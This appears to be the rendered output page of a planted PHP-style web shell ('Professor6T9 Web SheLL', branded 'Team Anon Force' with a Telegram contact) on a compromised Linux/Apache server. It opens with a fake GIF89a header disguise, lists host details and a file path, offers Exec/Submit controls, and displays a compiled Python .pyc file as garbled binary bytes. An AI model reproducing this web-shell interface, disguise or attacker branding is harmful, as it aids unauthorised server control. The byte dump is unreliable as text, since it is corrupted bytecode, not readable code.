GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
opt
/
ispmanager
/
python3.8
/
lib
/
python3.8
/
__pycache__
[ HOME ]
Exec
Submit
File Name : py_compile.cpython-38.opt-2.pyc
U ; TsaP� @ s� d dl Z d dlZd dlZd dlZd dlZd dlZd dlZd dlZddddgZ G dd� de �ZG dd� de j�Z dd � Zddd�Zdd d�Zedkr�e�e� � dS )� N�compile�main�PyCompileError�PycInvalidationModec @ s e Zd Zddd�Zdd� ZdS )r � c C st |j }|tkr2d�t�||��}|�dd| �}nd||f }t�| |pJ||||� || _|| _ || _ |pl|| _d S )Nr zFile "<string>"z File "%s"z Sorry: %s: %s)�__name__�SyntaxError�join� traceback�format_exception_only�replace� Exception�__init__� exc_type_name� exc_value�file�msg)�self�exc_typer r r r �tbtext�errmsg� r �5/opt/ispmanager/python3.8/lib/python3.8/py_compile.pyr . s �zPyCompileError.__init__c C s | j S )N)r )r r r r �__str__>